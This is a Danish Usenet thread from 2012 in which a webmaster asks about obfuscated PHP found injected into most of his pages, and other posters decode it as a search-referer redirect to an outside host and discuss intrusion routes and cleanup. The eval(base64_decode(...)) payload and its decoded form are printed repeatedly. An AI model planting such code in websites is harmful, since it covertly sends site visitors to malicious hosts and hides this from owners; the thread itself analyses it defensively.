Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Mystisk php-kode
8 views
Skip to first unread message
Karl Erik Christensen
Mar 9, 2012, 10:00:07 AM3/9/12
to
Google advarer mod "Malware" på mit site ranunkelvej.com
Denne kode har "sneget" sig ind flere steder på mine sider:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
Hvad mon det helt konkret er for noget?
Nogen der kan oversætte?
Karl Erik.
--
http://dmwebdesign.dk - DM i Webdesign
http://produceret-i.dk/ - Køb danske produkter
http://webdesign.ranunkelvej.com - Artikler om webdesign
Denne kode har "sneget" sig ind flere steder på mine sider:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
Hvad mon det helt konkret er for noget?
Nogen der kan oversætte?
Karl Erik.
--
http://dmwebdesign.dk - DM i Webdesign
http://produceret-i.dk/ - Køb danske produkter
http://webdesign.ranunkelvej.com - Artikler om webdesign
Karl Erik Christensen
Mar 9, 2012, 10:20:25 AM3/9/12
to
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if
($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or
stristr($referer,"rambler") or stristr($referer,"gogo") or
stristr($referer,"live.com")or stristr($referer,"aport") or
stristr($referer,"nigma") or stristr($referer,"webalta") or
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or
!stristr($referer,"inurl")){ header("Location:
http://www.bpoffer.changeip.org/"); exit(); } } } }
Leif Neland
Mar 9, 2012, 10:21:59 AM3/9/12
to
"Karl Erik Christensen" <karl...@none.invalid> skrev i en meddelelse
news:4f5a1aec$0$283$1472...@news.sunsite.dk...
> Google advarer mod "Malware" på mit site ranunkelvej.com
>
> Denne kode har "sneget" sig ind flere steder på mine sider:
>
> eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
> wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
>
> Hvad mon det helt konkret er for noget?
> Nogen der kan oversætte?
>
Det kan http://www.motobit.com/util/base64-decoder-encoder.asp
>
> Denne kode har "sneget" sig ind flere steder på mine sider:
>
> eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
> wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
>
> Hvad mon det helt konkret er for noget?
> Nogen der kan oversætte?
>
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo")
or stristr($referer,"bing")
or stristr($referer,"rambler")
or stristr($referer,"gogo")
or stristr($referer,"live.com")
or stristr($referer,"aport")
or stristr($referer,"nigma")
or stristr($referer,"webalta")
or stristr($referer,"begun.ru")
or stristr($referer,"stumbleupon.com")
or stristr($referer,"bit.ly")
or stristr($referer,"tinyurl.com")
or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
or stristr($referer,"myspace.com")
or stristr($referer,"facebook.com")
or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
exit();
}
}
}
}
Hvis headers ikke er sendt så // Hvis headers er sendt, ville der komme
fejlmeddelelser, når dette script forsøger at sende en header.
Hvis man har en "user-agent" sat,
Hvis man kommer fra visse steder
Hvis der ikke er "cache" eller "inurl" i den url, man forwardes
til, så redirectes man til et skummelt sted.
Men måske er det skumle sted allerede lukket, med lynx og wget får man 403
Forbidden.
Leif
Christian Hansen
Mar 9, 2012, 10:22:17 AM3/9/12
to
On 03/09/2012 04:00 PM, Karl Erik Christensen wrote:
>eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
>
>
wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
>
>
eval evaluerer resultatet af en base64_encoded string.
Det betyder med andre ord, at nedenstående kode kører følgende:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or
stristr($referer,"rambler") or stristr($referer,"gogo") or
stristr($referer,"live.com")or stristr($referer,"aport") or
exit();
}
}
}
}
Den forsøger altså at sende brugeren hen på adressen
http://www.bpoffer.changeip.org/ - hvad der sker derfra har jeg ikke
tjekket, men så er man også ude af koden så at sige.
Men den gør det kun, hvis man er kommet på siden via en søgemaskine og
hvis du af en eller anden grund har outputbuffering slået til ( ellers
kan den ikke sende headeren med noget resultat ).
Det med søgemaskinen er lidt smart, for så er chancen for at du opdager
tricket ret lille, da du typisk går direkte på din side. Men Google
derimod...
--
Christian Hansen
http://www.resource-it.dk/
>eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlci
>
>
wiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy5icG9mZmVyLmNoYW5nZWlwLm9yZy8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));
>
>
eval evaluerer resultatet af en base64_encoded string.
Det betyder med andre ord, at nedenstående kode kører følgende:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or
stristr($referer,"rambler") or stristr($referer,"gogo") or
stristr($referer,"nigma") or stristr($referer,"webalta") or
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www.bpoffer.changeip.org/");
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
exit();
}
}
}
}
Den forsøger altså at sende brugeren hen på adressen
http://www.bpoffer.changeip.org/ - hvad der sker derfra har jeg ikke
tjekket, men så er man også ude af koden så at sige.
Men den gør det kun, hvis man er kommet på siden via en søgemaskine og
hvis du af en eller anden grund har outputbuffering slået til ( ellers
kan den ikke sende headeren med noget resultat ).
Det med søgemaskinen er lidt smart, for så er chancen for at du opdager
tricket ret lille, da du typisk går direkte på din side. Men Google
derimod...
--
Christian Hansen
http://www.resource-it.dk/
Leif Neland
Mar 9, 2012, 10:24:54 AM3/9/12
to
"Karl Erik Christensen" <karl...@none.invalid> skrev i en meddelelse
news:4f5a1aec$0$283$1472...@news.sunsite.dk...
> Hvad mon det helt konkret er for noget?
> Nogen der kan oversætte?
>
Vi er vist lige gode; 3 svar indenfor to minutter :-)
> Nogen der kan oversætte?
>
Leif
Asger Joergensen
Mar 9, 2012, 10:31:26 AM3/9/12
to
Hej Leif
Leif Neland skrev:
> Vi er vist lige gode; 3 svar indenfor to minutter :-)
Ja man skulle næsten tro at i lå på lur. ;-)
Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
ens side, og hvordan man kan sikre sig mod det ?
Er det kun hvis man har sin egen server eller er sådan noget også et problem
hos sådan nogle som One.com ?
Venlig hilsen
Asger-P
http://Asger-P.dk
Leif Neland skrev:
> Vi er vist lige gode; 3 svar indenfor to minutter :-)
Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
ens side, og hvordan man kan sikre sig mod det ?
Er det kun hvis man har sin egen server eller er sådan noget også et problem
hos sådan nogle som One.com ?
Venlig hilsen
Asger-P
http://Asger-P.dk
Karl Erik Christensen
Mar 9, 2012, 10:34:47 AM3/9/12
to
On 09-03-2012 16:22, Christian Hansen wrote:
> Den forsøger altså at sende brugeren hen på adressen
> http://www.bpoffer.changeip.org/ - hvad der sker derfra har jeg ikke
> tjekket, men så er man også ude af koden så at sige.
>
> Men den gør det kun, hvis man er kommet på siden via en søgemaskine og
> hvis du af en eller anden grund har outputbuffering slået til ( ellers
> kan den ikke sende headeren med noget resultat ).
>
> Det med søgemaskinen er lidt smart, for så er chancen for at du opdager
> tricket ret lille, da du typisk går direkte på din side. Men Google
> derimod...
Så kan jeg bare undre mig over, hvordan i hede hule helvede denne kode
> Den forsøger altså at sende brugeren hen på adressen
> http://www.bpoffer.changeip.org/ - hvad der sker derfra har jeg ikke
> tjekket, men så er man også ude af koden så at sige.
>
> Men den gør det kun, hvis man er kommet på siden via en søgemaskine og
> hvis du af en eller anden grund har outputbuffering slået til ( ellers
> kan den ikke sende headeren med noget resultat ).
>
> Det med søgemaskinen er lidt smart, for så er chancen for at du opdager
> tricket ret lille, da du typisk går direkte på din side. Men Google
> derimod...
er kommet ind på mine sider?
Jeg har fjernet koden og skiftet password på min server - men er dette
tilstrækkeligt?
Christian Hansen
Mar 9, 2012, 10:35:48 AM3/9/12
to
On 03/09/2012 04:31 PM, Asger Joergensen wrote:
> Hej Leif
> Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
> ens side, og hvordan man kan sikre sig mod det ?
Det er også det næste spørgsmål ,man skal stille sig selv.
Her er et par clues:
http://www.madirish.net/?article=436 <-- null byte poisoning
http://en.wikipedia.org/wiki/SQL_injection <-- sql injection
Det er ekstremt vigtigt, at man sanere alt data, der kan komme ind
udefra. Og det er ikke kun data via forms. det er netop også data via
urls ( GET mm ) som bruges i ens kode i eksempelvis sql-queries.
Jeg husker stadig, da php bare lige oversatte post- og get-vars til
globale variable i ens php-dokument. det var spændende tider :)
> Hej Leif
> Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
> ens side, og hvordan man kan sikre sig mod det ?
Her er et par clues:
http://www.madirish.net/?article=436 <-- null byte poisoning
http://en.wikipedia.org/wiki/SQL_injection <-- sql injection
Det er ekstremt vigtigt, at man sanere alt data, der kan komme ind
udefra. Og det er ikke kun data via forms. det er netop også data via
urls ( GET mm ) som bruges i ens kode i eksempelvis sql-queries.
Jeg husker stadig, da php bare lige oversatte post- og get-vars til
globale variable i ens php-dokument. det var spændende tider :)
Leif Neland
Mar 9, 2012, 10:39:09 AM3/9/12
to
>
> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne kode er
> kommet ind på mine sider?
Lå det i php/html-filer eller i database?
> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne kode er
> kommet ind på mine sider?
Er dit site et cms?
Hvis det er, er det så et kendt eller et hjemmelavet?
> Jeg har fjernet koden og skiftet password på min server - men er dette
> tilstrækkeligt?
Leif
Christian Hansen
Mar 9, 2012, 10:40:28 AM3/9/12
to
On 03/09/2012 04:34 PM, Karl Erik Christensen wrote:
>
> Jeg har fjernet koden og skiftet password på min server - men er dette
> tilstrækkeligt?
>
Det er det helt sikkert ikke. De har med 99% sikkerhed ikke haft dine
>
> Jeg har fjernet koden og skiftet password på min server - men er dette
> tilstrækkeligt?
>
adgangskoder men derimod anvendt et sikkerhedshul i din software ( CMS,
webserver ... ). Sørg for at du kører med opdaterede versioner af alt og
søg eventuelt efter andre, der har oplevet samme problemer som dig med
lign. setup.
Det kan være rigtigt svært at finde sit sikkerhedshul, men der er ikke
andet at gøre, end at forsøge.
Karl Erik Christensen
Mar 9, 2012, 10:45:20 AM3/9/12
to
On 09-03-2012 16:39, Leif Neland wrote:
> Lå det i php/html-filer eller i database?
> Er dit site et cms?
> Hvis det er, er det så et kendt eller et hjemmelavet?
php/html-filer
> Lå det i php/html-filer eller i database?
> Er dit site et cms?
> Hvis det er, er det så et kendt eller et hjemmelavet?
ikke-cms
Karl Erik.
Christian Hansen
Mar 9, 2012, 10:46:35 AM3/9/12
to
On 03/09/2012 04:45 PM, Karl Erik Christensen wrote:
> On 09-03-2012 16:39, Leif Neland wrote:
>> Lå det i php/html-filer eller i database?
>> Er dit site et cms?
>> Hvis det er, er det så et kendt eller et hjemmelavet?
>
> php/html-filer
Kunne være interessant at se dine filer i forhold til at gennemskue,
> On 09-03-2012 16:39, Leif Neland wrote:
>> Lå det i php/html-filer eller i database?
>> Er dit site et cms?
>> Hvis det er, er det så et kendt eller et hjemmelavet?
>
> php/html-filer
hvad der er gået galt.
Hvis du har en side, hvor du tager mod formulardata ( kontaktoformular
eller lign. ) så start der.
Karl Erik Christensen
Mar 9, 2012, 11:01:17 AM3/9/12
to
På mit web-sted har jeg måske 500 .php sider.
Koden findes på så godt som alle.
Karl Erik.
Christian Hansen
Mar 9, 2012, 11:05:52 AM3/9/12
to
On 03/09/2012 05:01 PM, Karl Erik Christensen wrote:
> On 09-03-2012 16:40, Christian Hansen wrote:
>
> På mit web-sted har jeg måske 500 .php sider.
> Koden findes på så godt som alle.
>
Det er jeg ikke i tvivl om, men det betyder ikke at sikkerhedshullet
> On 09-03-2012 16:40, Christian Hansen wrote:
>
> På mit web-sted har jeg måske 500 .php sider.
> Koden findes på så godt som alle.
>
findes på alle 500 sider til at starte med. Bare en side med hul og
ballet er åbnet.
Jeg ville kigge på sider, hvor formularindhold håndteres i første
omgang, hvis du har nogle sådanne,
Venligst
Christian
Jørn Andersen
Mar 9, 2012, 11:56:15 AM3/9/12
to
On 09 Mar 2012 15:31:26 GMT, "Asger Joergensen" <Ju...@Asger-P.dk>
wrote:
>Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
>ens side, og hvordan man kan sikre sig mod det ?
>
>Er det kun hvis man har sin egen server eller er sådan noget også et problem
>hos sådan nogle som One.com ?
Jeg oplevede for nogle år siden, at der var tilføjet noget JavaScript
i bunden af alle index.htm-filer på et site jeg administrerede. Jeg
fandt aldrig "hullet", men det kom ikke igen, efter at jeg havde
renset ud (og skiftet pw).
Det var på et anerkendt webhotel.
Mvh. Jørn
--
Jørn Andersen
http://socialister.dk
http://marxisme.dk
wrote:
>Men jeg kunne da godt tænke mig at vide hvordan sådan noget kommer ind på
>ens side, og hvordan man kan sikre sig mod det ?
>
>Er det kun hvis man har sin egen server eller er sådan noget også et problem
>hos sådan nogle som One.com ?
i bunden af alle index.htm-filer på et site jeg administrerede. Jeg
fandt aldrig "hullet", men det kom ikke igen, efter at jeg havde
renset ud (og skiftet pw).
Det var på et anerkendt webhotel.
Mvh. Jørn
--
Jørn Andersen
http://socialister.dk
http://marxisme.dk
Anders Wegge Keller
Mar 9, 2012, 12:24:04 PM3/9/12
to
Karl Erik Christensen <karl...@none.invalid> writes:
> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne
> kode er kommet ind på mine sider?
Hvis one.com har sat systemet op, så man kan komme til alle kunders
> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne
> kode er kommet ind på mine sider?
kode, når man har fået hul igennem hos en, kan det sagtens tænkes at
det er en helt anden kunde der er hostet på samme server der er
synderen.
Check at du ikke har givet skriverettigheder til dine filer til hele
verden.
> Jeg har fjernet koden og skiftet password på min server - men er dette
> tilstrækkeligt?
--
/Wegge
Leder efter redundant peering af dk.*,linux.debian.*
Karl Erik Christensen
Mar 9, 2012, 12:41:50 PM3/9/12
to
On 09-03-2012 18:24, Anders Wegge Keller wrote:
> Karl Erik Christensen<karl...@none.invalid> writes:
>
>> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne
>> kode er kommet ind på mine sider?
>
> Hvis one.com har sat systemet op, så man kan komme til alle kunders
> kode, når man har fået hul igennem hos en, kan det sagtens tænkes at
> det er en helt anden kunde der er hostet på samme server der er
> synderen.
>
> Check at du ikke har givet skriverettigheder til dine filer til hele
> verden.
>
>> Jeg har fjernet koden og skiftet password på min server - men er dette
>> tilstrækkeligt?
>
> Sandsynligvis ikke.
>
Siderne ligger hos UnoEuro - som svarer at jeg skal rense mine filer :-)
> Karl Erik Christensen<karl...@none.invalid> writes:
>
>> Så kan jeg bare undre mig over, hvordan i hede hule helvede denne
>> kode er kommet ind på mine sider?
>
> Hvis one.com har sat systemet op, så man kan komme til alle kunders
> kode, når man har fået hul igennem hos en, kan det sagtens tænkes at
> det er en helt anden kunde der er hostet på samme server der er
> synderen.
>
> Check at du ikke har givet skriverettigheder til dine filer til hele
> verden.
>
>> Jeg har fjernet koden og skiftet password på min server - men er dette
>> tilstrækkeligt?
>
> Sandsynligvis ikke.
>
Jeg har mistanke til en mailformular, som jeg dog udskiftede for et par
måneder siden, til en med chaptcha. Med den gamle fik jeg en del spam
fra russere.
Karl Erik.
